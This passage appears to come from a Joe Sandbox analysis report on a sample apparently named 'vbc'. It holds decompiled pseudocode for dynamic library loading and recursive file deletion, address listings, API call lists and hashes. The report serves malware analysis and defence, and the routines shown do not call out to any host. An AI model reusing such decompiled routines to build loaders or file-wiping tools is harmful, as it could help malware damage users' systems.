                                                							 *(_t332 + 0x1008) = _t226;
                                                							if(_t226 != _t283) {
                                                								L171:
                                                								_t192 = _t332 + 0x808; // 0x808
                                                								_t325 = _t192;
                                                								_t227 = E731916BD( *(_t332 + 0x1008), _t325);
                                                								__eflags = _t227 - _t283;
                                                								 *(_t332 + 0x100c) = _t227;
                                                								if(_t227 == _t283) {
                                                									__eflags =  *_t325 - 0x23;
                                                									if( *_t325 == 0x23) {
                                                										_t195 = _t332 + 0x80a; // 0x80a
                                                										_t231 = E731913B1(_t195);
                                                										__eflags = _t231 - _t283;
                                                										if(_t231 != _t283) {
                                                											__eflags = _t231 & 0xffff0000;
                                                											if((_t231 & 0xffff0000) == 0) {
                                                												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t283;
                                                								if(_v52 != _t283) {
                                                									L178:
                                                									_t325[lstrlenW(_t325)] = 0x57;
                                                									_t229 = E731916BD( *(_t332 + 0x1008), _t325);
                                                									__eflags = _t229 - _t283;
                                                									if(_t229 != _t283) {
                                                										L166:
                                                										 *(_t332 + 0x100c) = _t229;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t206 = _t332 + 4;
                                                									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                									__eflags =  *_t206;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									if( *(_t332 + 0x100c) != _t283) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t234 = LoadLibraryW(_t324);
                                                							__eflags = _t234 - _t283;
                                                							 *(_t332 + 0x1008) = _t234;
                                                							if(_t234 == _t283) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t332 + 0x808; // 0x808
                                                						_t236 = E731913B1(_t188);
                                                						 *(_t332 + 0x100c) = _t236;
                                                						__eflags = _t236 - _t283;
                                                						goto L180;
                                                					}
                                                					_t237 = _t225 - 1;
                                                					if(_t237 == 0) {
                                                						_t185 = _t332 + 0x808; // 0x808
                                                						_t238 = _t185;
                                                						__eflags =  *_t238 - _t283;
                                                						if( *_t238 == _t283) {
                                                							goto L182;
                                                						}
                                                						_t229 = E731913B1(_t238);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t237 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t332 + 8; // 0x8
                                                					_t284 = _t81;
                                                					_t326 = E731913B1(_t81);
                                                					 *(_t332 + 0x1008) = _t326;
                                                					if(_t326 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1050)) = E731912CC(_t284);
                                                					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                					_t90 = _t332 + 0x808; // 0x808
                                                					_t229 =  *(_t326->i + E731913B1(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}


































































                                                0x73191c07
                                                0x73191c0a
                                                0x73191c0d
                                                0x73191c10
                                                0x73191c13
                                                0x73191c16
                                                0x73191c19
                                                0x73191c1b
                                                0x73191c1e
                                                0x73191c21
                                                0x73191c26
                                                0x73191c29
                                                0x73191c31
                                                0x73191c39
                                                0x73191c3b
                                                0x73191c3e
                                                0x73191c46
                                                0x73191c46
                                                0x73191c4b
                                                0x73191c4e
                                                0x00000000
                                                0x00000000
                                                0x73191c5b
                                                0x73191c60
                                                0x73191c62
                                                0x73191cf4
                                                0x73191cf4
                                                0x73191cf4
                                                0x73191cf8
                                                0x73191cfb
                                                0x73191cfd
                                                0x73191d1f
                                                0x73191d21
                                                0x73191d24
                                                0x73191d2d
                                                0x73191d33
                                                0x73191d35
                                                0x73191d3b
                                                0x73191d3b
                                                0x73191d41
                                                0x73191d44
                                                0x73191d44
                                                0x73191d47
                                                0x73191d47
                                                0x73191d4d
                                                0x73191d4f
                                                0x73191d4f
                                                0x73191d51
                                                0x73191d54
                                                0x73191d57
                                                0x73191d5d
                                                0x73191d63
                                                0x73191d66
                                                0x73191d8a
                                                0x73191d8d
                                                0x00000000
                                                0x00000000
                                                0x73191d90
                                                0x73191d92
                                                0x73191da0
                                                0x73191da3
                                                0x73191da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191da7
                                                0x73191da7
                                                0x73191da7
                                                0x73191dad
                                                0x73191daf
                                                0x00000000
                                                0x00000000
                                                0x73191db1
                                                0x73191db3
                                                0x73191db5
                                                0x73191db7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191db7
                                                0x73191db9
                                                0x73191dbb
                                                0x73191dbd
                                                0x73191dbd
                                                0x73191dc3
                                                0x73191dc9
                                                0x73191dcb
                                                0x73191ddf
                                                0x73191ddf
                                                0x73191de1
                                                0x73191dcd
                                                0x73191dd3
                                                0x73191dd6
                                                0x73191dd6
                                                0x00000000
                                                0x73191d68
                                                0x73191d68
                                                0x73191d68
                                                0x73191d69
                                                0x73191d71
                                                0x73191d75
                                                0x73191d7b
                                                0x73191d7f
                                                0x00000000
                                                0x73191d7f
                                                0x73191d6b
                                                0x73191d6b
                                                0x73191d6c
                                                0x00000000
                                                0x00000000
                                                0x73191d6e
                                                0x73191d6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191d6f
                                                0x73191cff
                                                0x73191d00
                                                0x73191d09
                                                0x73191d0c
                                                0x73191d19
                                                0x73191d19
                                                0x73191d0e
                                                0x73191d0e
                                                0x73191de7
                                                0x73191dea
                                                0x73191dee
                                                0x73191e61
                                                0x73191e65
                                                0x73191c43
                                                0x00000000
                                                0x73191c43
                                                0x00000000
                                                0x73191e65
                                                0x73191cfd
                                                0x73191c68
                                                0x73191c6b
                                                0x73191cce
                                                0x73191cd1
                                                0x73191ce3
                                                0x73191ce3
                                                0x73191ce6
                                                0x73191df3
                                                0x73191df6
                                                0x73191df6
                                                0x73191df8
                                                0x731921ae
                                                0x731921c6
                                                0x731921c6
                                                0x731921c9
                                                0x00000000
                                                0x00000000
                                                0x731921b3
                                                0x731921b4
                                                0x731921b7
                                                0x731921ba
                                                0x73192244
                                                0x7319224b
                                                0x73192251
                                                0x73192255
                                                0x73191e5c
                                                0x73191e5d
                                                0x73191e5d
                                                0x73191e5e
                                                0x00000000
                                                0x73191e5e
                                                0x731921c0
                                                0x731921c3
                                                0x731921c3
                                                0x731921cb
                                                0x731921ce
                                                0x73192238
                                                0x73191e51
                                                0x73191e54
                                                0x73191e57
                                                0x73191e5a
                                                0x73191e5a
                                                0x00000000
                                                0x73191e5a
                                                0x731921d0
                                                0x731921d3
                                                0x731921da
                                                0x731921da
                                                0x731921dd
                                                0x731921e1
                                                0x731921f5
                                                0x731921f5
                                                0x731921f8
                                                0x731921fc
                                                0x00000000
                                                0x00000000
                                                0x731921fe
                                                0x73192202
                                                0x00000000
                                                0x00000000
                                                0x73192204
                                                0x7319220b
                                                0x7319220b
                                                0x73192211
                                                0x73192214
                                                0x73192230
                                                0x73192216
                                                0x7319221f
                                                0x73192222
                                                0x73192222
                                                0x00000000
                                                0x73192214
                                                0x731921e3
                                                0x731921e6
                                                0x731921ea
                                                0x00000000
                                                0x00000000
                                                0x731921ec
                                                0x00000000
                                                0x731921ec
                                                0x731921d5
                                                0x731921d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x731921d8
                                                0x73191dfe
                                                0x73191dfe
                                                0x73191dff
                                                0x73191f49
                                                0x73191f49
                                                0x73191f50
                                                0x73191f53
                                                0x00000000
                                                0x00000000
                                                0x73191f60
                                                0x00000000
                                                0x7319214b
                                                0x7319214e
                                                0x73192151
                                                0x73192151
                                                0x73192152
                                                0x73192153
                                                0x73192156
                                                0x73192159
                                                0x7319215c
                                                0x00000000
                                                0x00000000
                                                0x7319215e
                                                0x7319215e
                                                0x73192162
                                                0x7319217a
                                                0x7319217d
                                                0x73192181
                                                0x73192187
                                                0x00000000
                                                0x73192187
                                                0x73192164
                                                0x73192164
                                                0x73192167
                                                0x00000000
                                                0x00000000
                                                0x73192169
                                                0x7319216c
                                                0x7319216e
                                                0x7319216f
                                                0x7319216f
                                                0x7319216f
                                                0x73192170
                                                0x73192173
                                                0x73192176
                                                0x73192177
                                                0x73192151
                                                0x73192152
                                                0x73192153
                                                0x73192156
                                                0x73192159
                                                0x7319215c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x7319215c
                                                0x00000000
                                                0x73191fa7
                                                0x00000000
                                                0x00000000
                                                0x73191fb3
                                                0x00000000
                                                0x00000000
                                                0x73191f9a
                                                0x73191f9e
                                                0x73191fa2
                                                0x00000000
                                                0x00000000
                                                0x7319211c
                                                0x73192120
                                                0x00000000
                                                0x00000000
                                                0x73192126
                                                0x7319212f
                                                0x73192136
                                                0x7319213e
                                                0x00000000
                                                0x00000000
                                                0x73192083
                                                0x73192083
                                                0x00000000
                                                0x00000000
                                                0x73191fbc
                                                0x00000000
                                                0x00000000
                                                0x731921a6
                                                0x00000000
                                                0x00000000
                                                0x7319208b
                                                0x7319208d
                                                0x7319208d
                                                0x00000000
                                                0x00000000
                                                0x73192196
                                                0x00000000
                                                0x00000000
                                                0x7319219a
                                                0x00000000
                                                0x00000000
                                                0x731921a2
                                                0x00000000
                                                0x00000000
                                                0x731920d3
                                                0x731920d5
                                                0x731920d5
                                                0x00000000
                                                0x00000000
                                                0x7319209d
                                                0x7319209f
                                                0x7319209f
                                                0x00000000
                                                0x00000000
                                                0x731920af
                                                0x731920b1
                                                0x731920b1
                                                0x00000000
                                                0x00000000
                                                0x731920e1
                                                0x731920e3
                                                0x731920e3
                                                0x00000000
                                                0x00000000
                                                0x731920ba
                                                0x731920bc
                                                0x731920bc
                                                0x00000000
                                                0x00000000
                                                0x731920c1
                                                0x00000000
                                                0x00000000
                                                0x7319219e
                                                0x731921a8
                                                0x731921a8
                                                0x00000000
                                                0x00000000
                                                0x731920ec
                                                0x731920f0
                                                0x731920f5
                                                0x731920f8
                                                0x731920f9
                                                0x731920fc
                                                0x73192102
                                                0x73192102
                                                0x00000000
                                                0x00000000
                                                0x7319218e
                                                0x00000000
                                                0x00000000
                                                0x731920c5
                                                0x731920c7
                                                0x731920c7
                                                0x00000000
                                                0x00000000
                                                0x73191fc3
                                                0x73191fc3
                                                0x00000000
                                                0x00000000
                                                0x731920da
                                                0x731920dc
                                                0x731920dc
                                                0x00000000
                                                0x00000000
                                                0x73191f67
                                                0x73191f6d
                                                0x73191f70
                                                0x73191f72
                                                0x73191f72
                                                0x73191f75
                                                0x73191f79
                                                0x73191f86
                                                0x73191f88
                                                0x73191f8e
                                                0x73191f8e
                                                0x73191f8e
                                                0x00000000
                                                0x00000000
                                                0x7319208e
                                                0x7319208e
                                                0x73192090
                                                0x73192097
                                                0x00000000
                                                0x00000000
                                                0x731920d6
                                                0x731920d6
                                                0x00000000
                                                0x00000000
                                                0x731920a0
                                                0x731920a0
                                                0x731920a2
                                                0x731920a9
                                                0x00000000
                                                0x00000000
                                                0x731920b2
                                                0x731920b2
                                                0x731920b4
                                                0x00000000
                                                0x00000000
                                                0x731920e4
                                                0x731920e4
                                                0x00000000
                                                0x00000000
                                                0x731920bd
                                                0x731920bd
                                                0x00000000
                                                0x00000000
                                                0x7319210a
                                                0x7319210e
                                                0x73192113
                                                0x73192116
                                                0x00000000
                                                0x00000000
                                                0x731920c8
                                                0x731920c8
                                                0x731920cb
                                                0x731920cd
                                                0x00000000
                                                0x00000000
                                                0x731920dd
                                                0x731920dd
                                                0x731920e6
                                                0x731920e6
                                                0x73191fc5
                                                0x73191fc5
                                                0x73191fc8
                                                0x73191fcf
                                                0x73191fd1
                                                0x73191fd3
                                                0x73191fda
                                                0x73191fdd
                                                0x73191fe2
                                                0x73191fe4
                                                0x73191fe6
                                                0x73191fea
                                                0x73191ff0
                                                0x73191ff6
                                                0x73191ff6
                                                0x73191ff8
                                                0x73191ff8
                                                0x73191ff9
                                                0x73191ff9
                                                0x73191ffd
                                                0x73192003
                                                0x73192005
                                                0x73192009
                                                0x7319200e
                                                0x7319200e
                                                0x73192010
                                                0x73192010
                                                0x73192013
                                                0x73192016
                                                0x7319201f
                                                0x73192025
                                                0x73192028
                                                0x73192028
                                                0x7319202a
                                                0x7319202d
                                                0x73192033
                                                0x73192039
                                                0x73192039
                                                0x7319203b
                                                0x00000000
                                                0x00000000
                                                0x73192041
                                                0x73192041
                                                0x73192045
                                                0x7319204c
                                                0x73192070
                                                0x73192070
                                                0x73192074
                                                0x73192076
                                                0x73192079
                                                0x73192079
                                                0x7319207c
                                                0x7319207c
                                                0x00000000
                                                0x73192074
                                                0x73192051
                                                0x73192054
                                                0x73192054
                                                0x7319205b
                                                0x7319205d
                                                0x73192060
                                                0x73192067
                                                0x73192068
                                                0x7319206e
                                                0x7319206e
                                                0x00000000
                                                0x7319206e
                                                0x73192062
                                                0x73192065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73192065
                                                0x73191ff2
                                                0x73191ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191f60
                                                0x73191e05
                                                0x73191e05
                                                0x73191e06
                                                0x73191f46
                                                0x00000000
                                                0x73191f46
                                                0x73191e0c
                                                0x73191e0d
                                                0x00000000
                                                0x00000000
                                                0x73191e13
                                                0x73191e16
                                                0x73191f0b
                                                0x73191f0b
                                                0x73191f0e
                                                0x73191f23
                                                0x73191f25
                                                0x73191f25
                                                0x73191f26
                                                0x73191f29
                                                0x73191f2c
                                                0x73191f38
                                                0x73191f38
                                                0x73191f38
                                                0x73191f2e
                                                0x73191f2e
                                                0x73191f2e
                                                0x73191f3e
                                                0x00000000
                                                0x73191f3e
                                                0x73191f10
                                                0x73191f10
                                                0x73191f11
                                                0x73191f1f
                                                0x00000000
                                                0x73191f1f
                                                0x73191f14
                                                0x73191f15
                                                0x00000000
                                                0x00000000
                                                0x73191f1b
                                                0x00000000
                                                0x73191f1b
                                                0x73191e1c
                                                0x73191f07
                                                0x00000000
                                                0x73191f07
                                                0x73191e22
                                                0x73191e22
                                                0x73191e25
                                                0x73191e4e
                                                0x00000000
                                                0x73191e4e
                                                0x73191e27
                                                0x73191e27
                                                0x73191e2a
                                                0x73191e44
                                                0x00000000
                                                0x73191e44
                                                0x73191e2c
                                                0x73191e2c
                                                0x73191e2f
                                                0x73191e3e
                                                0x00000000
                                                0x73191e3e
                                                0x73191e32
                                                0x73191e33
                                                0x00000000
                                                0x00000000
                                                0x73191e35
                                                0x00000000
                                                0x73191cec
                                                0x73191cec
                                                0x73191cef
                                                0x00000000
                                                0x73191cef
                                                0x73191ce6
                                                0x73191cd3
                                                0x73191cd8
                                                0x00000000
                                                0x00000000
                                                0x73191cda
                                                0x73191cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191cdd
                                                0x73191c6d
                                                0x73191c70
                                                0x73191ca6
                                                0x73191ca9
                                                0x00000000
                                                0x73191caf
                                                0x73191cb1
                                                0x73191cb5
                                                0x73191cbc
                                                0x73191cc3
                                                0x73191cc6
                                                0x73191cc9
                                                0x00000000
                                                0x73191cc9
                                                0x73191ca9
                                                0x73191c72
                                                0x73191c73
                                                0x73191c8e
                                                0x73191c91
                                                0x00000000
                                                0x73191c97
                                                0x73191c97
                                                0x73191c9e
                                                0x73191ca1
                                                0x00000000
                                                0x73191ca1
                                                0x73191c91
                                                0x73191c78
                                                0x00000000
                                                0x73191c7e
                                                0x73191c7e
                                                0x73191c85
                                                0x00000000
                                                0x73191c85
                                                0x73191c78
                                                0x73191e74
                                                0x73191e79
                                                0x73191e7e
                                                0x73191e82
                                                0x73192355
                                                0x7319235b
                                                0x73191e94
                                                0x73191e96
                                                0x73191e97
                                                0x7319227e
                                                0x7319227e
                                                0x73192281
                                                0x73192284
                                                0x731922a1
                                                0x731922a7
                                                0x731922a9
                                                0x731922af
                                                0x731922c6
                                                0x731922c6
                                                0x731922c6
                                                0x731922d3
                                                0x731922d9
                                                0x731922dc
                                                0x731922e2
                                                0x731922e4
                                                0x731922e8
                                                0x731922ea
                                                0x731922f1
                                                0x731922f6
                                                0x731922f9
                                                0x731922fb
                                                0x73192300
                                                0x73192312
                                                0x73192312
                                                0x73192300
                                                0x731922f9
                                                0x731922e8
                                                0x73192318
                                                0x7319231b
                                                0x73192325
                                                0x7319232d
                                                0x7319233a
                                                0x73192340
                                                0x73192343
                                                0x73192273
                                                0x73192273
                                                0x00000000
                                                0x73192273
                                                0x73192349
                                                0x7319234f
                                                0x7319234f
                                                0x00000000
                                                0x00000000
                                                0x73192351
                                                0x73192351
                                                0x73192351
                                                0x73192351
                                                0x00000000
                                                0x7319231d
                                                0x7319231d
                                                0x73192323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73192323
                                                0x7319231b
                                                0x731922b2
                                                0x731922b8
                                                0x731922ba
                                                0x731922c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x731922c0
                                                0x73192286
                                                0x7319228d
                                                0x73192293
                                                0x73192299
                                                0x00000000
                                                0x73192299
                                                0x73191e9d
                                                0x73191e9e
                                                0x7319225d
                                                0x7319225d
                                                0x73192263
                                                0x73192266
                                                0x00000000
                                                0x00000000
                                                0x7319226d
                                                0x73192272
                                                0x00000000
                                                0x73192272
                                                0x73191ea5
                                                0x00000000
                                                0x00000000
                                                0x73191eab
                                                0x73191eab
                                                0x73191eb4
                                                0x73191eb9
                                                0x73191ebf
                                                0x00000000
                                                0x00000000
                                                0x73191ec5
                                                0x73191ed2
                                                0x73191ed8
                                                0x73191ee2
                                                0x73191ee8
                                                0x73191ef0
                                                0x73191f00
                                                0x00000000
                                                0x73191f00

                                                APIs
                                                  • Part of subcall function 731912BB: GlobalAlloc.KERNELBASE(00000040,?,731912DB,?,7319137F,00000019,731911CA,-000000A0), ref: 731912C5
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73191D2D
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 73191D75
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 73191D7F
                                                • GlobalFree.KERNEL32(00000000), ref: 73191D92
                                                • GlobalFree.KERNEL32(?), ref: 73191E74
                                                • GlobalFree.KERNEL32(?), ref: 73191E79
                                                • GlobalFree.KERNEL32(?), ref: 73191E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 73192068
                                                • lstrcpyW.KERNEL32(?,?), ref: 73192222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 731922A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 731922B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 7319230C
                                                • lstrlenW.KERNEL32(00000808), ref: 73192326
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: d1ed8c9c9ec0eddf9c6db57ecaacb21d00bcb61c9fb0ef724a5f5e00bc390434
                                                • Instruction ID: 82ba6458d20013a3f3e9e9569e6e8fb28ca944b92616b69aecccfd335afa41ce
                                                • Opcode Fuzzy Hash: d1ed8c9c9ec0eddf9c6db57ecaacb21d00bcb61c9fb0ef724a5f5e00bc390434
                                                • Instruction Fuzzy Hash: D3229A71D0028DDFEB128FA489847EEB7F4FB08315F27457AD1A6A6680D77096C28B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 676 405cc1-405cc2 call 405e58 670->676 677 405cb4-405cbf lstrcatW 670->677 671->668 675 405dba-405dbd 671->675 672->670 672->671 678 405dc7-405dcf call 406873 675->678 679 405dbf-405dc5 675->679 681 405cc7-405ccb 676->681 677->681 678->668 687 405dd1-405de5 call 405e0c call 405c01 678->687 679->668 684 405cd7-405cdd lstrcatW 681->684 685 405ccd-405cd5 681->685 686 405ce2-405cfe lstrlenW FindFirstFileW 684->686 685->684 685->686 688 405d04-405d0c 686->688 689 405da8-405dac 686->689 703 405de7-405dea 687->703 704 405dfd-405e00 call 40559f 687->704 691 405d2c-405d40 call 40653d 688->691 692 405d0e-405d16 688->692 689->671 694 405dae 689->694 705 405d42-405d4a 691->705 706 405d57-405d62 call 405c01 691->706 695 405d18-405d20 692->695 696 405d8b-405d9b FindNextFileW 692->696 694->671 695->691 699 405d22-405d2a 695->699 696->688 702 405da1-405da2 FindClose 696->702 699->691 699->696 702->689 703->679 707 405dec-405dfb call 40559f call 4062fd 703->707 704->668 705->696 708 405d4c-405d55 call 405c49 705->708 714 405d83-405d86 call 40559f 706->714 715 405d64-405d67 706->715 707->668 708->696 714->696 718 405d69-405d79 call 40559f call 4062fd 715->718 719 405d7b-405d81 715->719 718->696 719->696
                                                C-Code - Quality: 98%
                                                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405F14(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x434f88 =  *0x434f88 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E0040653D(0x42f270, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E58(_t68);
                                                					} else {
                                                						lstrcatW(0x42f270, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E0040653D(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405C01(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E0040559F(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x434f88 =  *0x434f88 + 1;
                                                										} else {
                                                											E0040559F(0xfffffff1, _t68);
                                                											E004062FD(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C49(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x42f270 - 0x5c;
                                                					if( *0x42f270 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406873(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405E0C(_t68);
                                                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E0040559F(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E0040559F(0xfffffff1, _t68);
                                                							return E004062FD(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x434f88 =  *0x434f88 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c53
                                                0x00405c58
                                                0x00405c61
                                                0x00405c64
                                                0x00405c6c
                                                0x00405c6f
                                                0x00405c72
                                                0x00405c7a
                                                0x00405c7c
                                                0x00405c7d
                                                0x00000000
                                                0x00405c7d
                                                0x00405c88
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8f
                                                0x00405ca2
                                                0x00405ca9
                                                0x00405cae
                                                0x00405cb2
                                                0x00405cc2
                                                0x00405cb4
                                                0x00405cba
                                                0x00405cba
                                                0x00405cc7
                                                0x00405ccb
                                                0x00405cd7
                                                0x00405cdd
                                                0x00405ce2
                                                0x00405ce8
                                                0x00405cf3
                                                0x00405cf9
                                                0x00405cfb
                                                0x00405cfe
                                                0x00405da8
                                                0x00405da8
                                                0x00405dac
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d04
                                                0x00405d04
                                                0x00405d04
                                                0x00405d0c
                                                0x00405d2c
                                                0x00405d34
                                                0x00405d39
                                                0x00405d40
                                                0x00405d5b
                                                0x00405d60
                                                0x00405d62
                                                0x00405d86
                                                0x00405d64
                                                0x00405d64
                                                0x00405d67
                                                0x00405d7b
                                                0x00405d69
                                                0x00405d6c
                                                0x00405d74
                                                0x00405d74
                                                0x00405d67
                                                0x00405d42
                                                0x00405d48
                                                0x00405d4a
                                                0x00405d50
                                                0x00405d50
                                                0x00405d4a
                                                0x00000000
                                                0x00405d40
                                                0x00405d0e
                                                0x00405d16
                                                0x00000000
                                                0x00000000
                                                0x00405d18
                                                0x00405d20
                                                0x00000000
                                                0x00000000
                                                0x00405d22
                                                0x00405d2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d8b
                                                0x00405d93
                                                0x00405d99
                                                0x00405d99
                                                0x00405da2
                                                0x00000000
                                                0x00405da2
                                                0x00405ccd
                                                0x00405cd5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c91
                                                0x00405c91
                                                0x00405c93
                                                0x00405db3
                                                0x00405db5
                                                0x00405db8
                                                0x00405e09
                                                0x00405e09
                                                0x00405e09
                                                0x00405dba
                                                0x00405dbd
                                                0x00405dc8
                                                0x00405dcd
                                                0x00405dcf
                                                0x00000000
                                                0x00000000
                                                0x00405dd2
                                                0x00405dde
                                                0x00405de3
                                                0x00405de5
                                                0x00000000
                                                0x00405e00
                                                0x00405de7
                                                0x00405dea
                                                0x00000000
                                                0x00000000
                                                0x00405def
                                                0x00000000
                                                0x00405df6
                                                0x00405dbf
                                                0x00405dbf
                                                0x00000000
                                                0x00405dbf
                                                0x00405c99
                                                0x00405c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c9c

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                • lstrcatW.KERNEL32 ref: 00405CBA
                                                • lstrcatW.KERNEL32 ref: 00405CDD
